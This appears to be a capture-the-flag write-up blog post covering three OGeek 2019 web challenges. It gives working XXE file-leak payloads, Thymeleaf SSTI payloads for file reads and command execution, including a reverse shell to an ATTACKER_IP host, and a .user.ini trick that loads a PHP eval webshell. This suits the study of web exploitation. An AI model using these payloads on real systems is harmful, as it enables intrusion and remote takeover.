OPPO OGeek 2019 WEB

September 08, 2019

I didn't play OGeek for various reasons, but I heard the quality was decent. Back at school with nothing to do, and with the challenge environments conveniently still up, I worked through them, partly solving and partly reproducing others' solutions.

LookAround

It looks like XML, so let's capture the request.

Try XXE.
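
As an illustration only (the endpoint path, element names and the /etc/passwd target are assumptions, not the exact request used), a first in-band probe looks roughly like this:

import requests

# Hypothetical endpoint; the real one came from the captured request.
url = "http://TARGET/notify"

# Classic in-band XXE probe: declare an external entity and reference it,
# hoping the parsed value gets reflected in the response.
payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

r = requests.post(url, data=payload, headers={"Content-Type": "application/xml"})
print(r.status_code)
print(r.text)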

Tried it and found there is no output echoed back.

https://xz.aliyun.com/t/3357#toc-8

Tried loading an external DTD, but the box has no outbound network access.

So let's see whether a local DTD can be abused instead.

https://www.freebuf.com/articles/web/195899.html

With no output, the only option is to fuzz (the challenge actually states it is built from tomcat:8-jre8); you can also pull that image and hunt for local DTDs inside it.

https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
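
With no output at all, one way to tell which local DTDs exist is to point a parameter entity at candidate paths and compare the responses, since a path that resolves usually produces a different error or response length than one that doesn't. A rough sketch of that idea (the endpoint and the candidate list are assumptions; the lists from the post above are the real source):

import requests

url = "http://TARGET/notify"  # hypothetical endpoint

# Candidate local DTD paths, e.g. pulled from the tomcat:8-jre8 image or
# from the dtd-finder lists referenced above.
candidates = [
    "/usr/share/xml/fontconfig/fonts.dtd",
    "/usr/share/yelp/dtd/docbookx.dtd",
    "/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd",
]

template = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY %% local_dtd SYSTEM "file://%s">
  %%local_dtd;
]>
<root>test</root>"""

for path in candidates:
    r = requests.post(url, data=template % path,
                      headers={"Content-Type": "application/xml"})
    # An existing DTD tends to change the parser error / response length.
    print(path, r.status_code, len(r.text))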

fonts.dtd turns out to exist.

Use the first payload from the reference above.
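
A sketch of that style of payload, wrapped in a small sender (the endpoint is a placeholder and the exact payload may differ from the one used; it follows the dtd-finder pattern of redefining a parameter entity from fonts.dtd to leak a file through a parser error):

import requests

url = "http://TARGET/notify"  # hypothetical endpoint

# Error-based XXE via the local fontconfig DTD: redefining %expr makes the
# included fonts.dtd declare our own entities, and the file content is
# leaked through the error for a nonexistent URI.
payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
  <!ENTITY % expr 'aaa)>
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    <!ELEMENT aa (bb'>
  %local_dtd;
]>
<message>test</message>"""

r = requests.post(url, data=payload, headers={"Content-Type": "application/xml"})
print(r.text)  # if the parser error is reflected, the file content shows up inside it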

render

Poking around a bit, the error page turns out to be Spring Boot's.

The challenge is named render, so the intended vulnerability is presumably SSTI.

Start fuzzing.
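
A typical probe just checks whether an expression inside the template gets evaluated, using the same JSON body format as the payload further down (the endpoint path is a placeholder):

import requests

url = "http://TARGET/render"  # hypothetical endpoint

# If the template engine evaluates the expression, 49 comes back in place of
# the literal ${7*7} -- the classic SSTI check.
probe = {"content": '<p th:text="${7*7}">test</p>'}

r = requests.post(url, json=probe)
print(r.status_code)
print(r.text)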

It works: Thymeleaf SSTI.

https://dotblogs.com.tw/cylcode/2018/09/21/170510

Read the flag.
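
One way to read a file through Thymeleaf with SpringEL (the /flag path and the endpoint are guesses, and this is not necessarily the exact payload used):

import requests

url = "http://TARGET/render"  # hypothetical endpoint

# SpringEL allows constructor calls, so a file can be read directly;
# /flag is an assumed location.
payload = {
    "content": '<p th:text="${new java.io.BufferedReader('
               'new java.io.FileReader(\'/flag\')).readLine()}"></p>'
}

r = requests.post(url, json=payload)
print(r.text)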

Here is another payload I have seen elsewhere:

{"content":"<p th:text=\"${#ctx.getClass().getClass().forName(&quot;java.lang.Runtime&quot;).getRuntime().exec(&quot;bash -c {echo,xxxxxxxxx==}|{base64,-d}|{bash,-i}&quot;).toString()}\"></p>"}

Replace xxxxxxxxx== with the base64 of your own reverse-shell command.
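
For completeness, a small sketch that builds and sends that payload (the endpoint, attacker IP and port are placeholders; start a listener such as nc -lvnp 4444 first):

import base64
import requests

url = "http://TARGET/render"  # hypothetical endpoint
shell = "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"  # your reverse shell

b64 = base64.b64encode(shell.encode()).decode()

# Same structure as the payload above, with the base64 blob in place of xxxxxxxxx==
payload = {
    "content": '<p th:text="${#ctx.getClass().getClass().forName('
               '&quot;java.lang.Runtime&quot;).getRuntime().exec('
               '&quot;bash -c {echo,' + b64 + '}|{base64,-d}|{bash,-i}&quot;'
               ').toString()}"></p>'
}

r = requests.post(url, json=payload)
print(r.status_code)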

enjoy your self

<?php
error_reporting(0);
include "../../utils/utils.php";

if(isset($_REQUEST['filename'])  and preg_match("/^\w{8}$/", $_REQUEST['filename'])){
    $filename = strtolower($_REQUEST['filename']);
    touch("backup/{$filename}.txt");
    unlink(glob("backup/*")[0]);
}
else{
    highlight_file(__FILE__);
}

?>

A quick look: the regex requires the filename to be exactly eight word characters ([a-zA-Z0-9_]).

It creates that file under backup/, then deletes the first file returned by glob("backup/*").

It seems odd that only the first matched file gets deleted.

My guess is that there is some file under backup/ that cannot be deleted.

Fuzz the filename. glob() returns entries in alphabetical order, so if our test name sorts before the hidden file, our file is glob()[0] and gets deleted (the follow-up GET returns 404); if it sorts after, the undeletable hidden file is glob()[0] and our file survives (200). Padding with 'z' and walking through the character set therefore recovers the hidden filename one character at a time:

#coding:utf-8
import requests
import string

filename = ""
dicts = string.digits+string.lowercase  # candidate characters, in ascending ASCII order

# print dicts
cc = 7  # number of trailing 'z' padding characters

url = 'http://47.107.255.20:18088/users/bc6b3f008512160e7139eca8afc23363/'

for i in xrange(8):
    for _ in dicts:
        temp = filename + _ +"z" * cc
        print "test------------>"+temp
        requests.get(url+'?filename='+temp)  # create backup/<temp>.txt (and trigger the unlink)

        res = requests.get(url+'backup/'+temp+'.txt')

        if res.status_code == 200:
            print temp
            filename = filename + _
            cc -= 1
            break

The script stops at aefebab8; visiting /backup/aefebab8.txt gives:

<!-- src/8a66c58a168c9dc0fb622365cbe340fc.php -->

<?php
include "../utils/utils.php";

$sandbox = Get_Sandbox();

if(isset($_REQUEST['method'])){
    $method = $_REQUEST['method'];

    if($method == 'info'){
        phpinfo();
    }elseif($method == 'download' and isset($_REQUEST['url'])){
        $url = $_REQUEST['url'];
        $url_parse = parse_url($url);

        if(!isset($url_parse['scheme']) or $url_parse['scheme'] != 'http' or !isset($url_parse['host']) or $url_parse['host'] == ""){
            die("something wrong");
        }

        $path_info = pathinfo($url);

        if(strpos($path_info['filename'], ".") !== false){
            die("something wrong");
        }

        if(!Check_Ext($path_info['extension'])){
            die("something wrong");
        }

        $response = GetFileInfoFromHeader($url);

        $save_dir = "../users/${sandbox}/uploads/{$response['type']}/";

        if(is_dir(dirname($save_dir)) and !is_dir($save_dir)){
            mkdir($save_dir, 0755);
        }

        $save_path = "{$save_dir}{$path_info['filename']}.{$response['ext']}";
        echo "/uploads/{$response['type']}/{$path_info['filename']}.{$response['ext']}";

        if(!is_dir($save_path)){
            file_put_contents($save_path, $response['content']);
        }
    }
}

The info method hands you phpinfo().

phpinfo() reveals the web root, and disable_functions bans a whole pile of functions.

There is a remote file download feature, but it only saves files with image extensions such as jpg and png locally.

$response is built from the Content-Type response header returned by the remote server.

The main idea is to control that Content-Type header so that a .user.ini gets written into /var/www/html/users/, with its content being an auto_prepend_file directive that pulls in a one-liner webshell, and then to request a PHP file under /users/.
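
utils.php (and so GetFileInfoFromHeader()) isn't included above, so how exactly it splits the Content-Type into the 'type' and 'ext' parts is an assumption; under the guess that it simply splits on '/', the attacker-side server could look something like this conceptual sketch, answering the /.png request with a path-traversing Content-Type and the .user.ini body, and serving the actual one-liner as an "image" otherwise:

# Conceptual sketch only: the Content-Type value below assumes
# GetFileInfoFromHeader() splits it on '/' into type ('..') and ext ('user.ini'),
# which would make the save path resolve to ../users/<sandbox>/.user.ini.
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/.png":
            # body of the .user.ini: prepend the "image" uploaded separately
            body = b"auto_prepend_file=uploads/image/shell.png\n"
            ctype = "../user.ini"
        else:
            # the "image" containing the one-liner webshell
            body = b"<?php eval($_POST['cmd']); ?>"
            ctype = "image/png"
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

HTTPServer(("0.0.0.0", 80), Handler).serve_forever()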

import requests

while True:
    # trigger the download endpoint so the crafted remote response gets saved
    print(requests.get("http://47.107.255.20:18088/src/8a66c58a168c9dc0fb622365cbe340fc.php?method=download&url=http://xxxxxxxxx/.png").text)

    # once the .user.ini and prepended one-liner are in effect, cmd gets executed
    r = requests.post("http://47.107.255.20:18088/users/64b066ab932af940f9e5d242bf9bf777/", data={"cmd": "phpinfo();"})
    print(r.status_code)

    if r.status_code != 404:
        print(r.text)
        exit(0)
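
One note on the retry loop: PHP only re-reads .user.ini files after user_ini.cache_ttl expires (300 seconds by default), so even once everything is written it can take a while before the prepended code actually runs.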

Author: Char0n
Link: http://charon.xin/2019/09/08/OPPO-OGeek-2019-WEB/
Copyright: Unless otherwise stated, all posts on this blog are licensed under CC BY-NC-SA 3.0 CN. Please credit the source when reposting!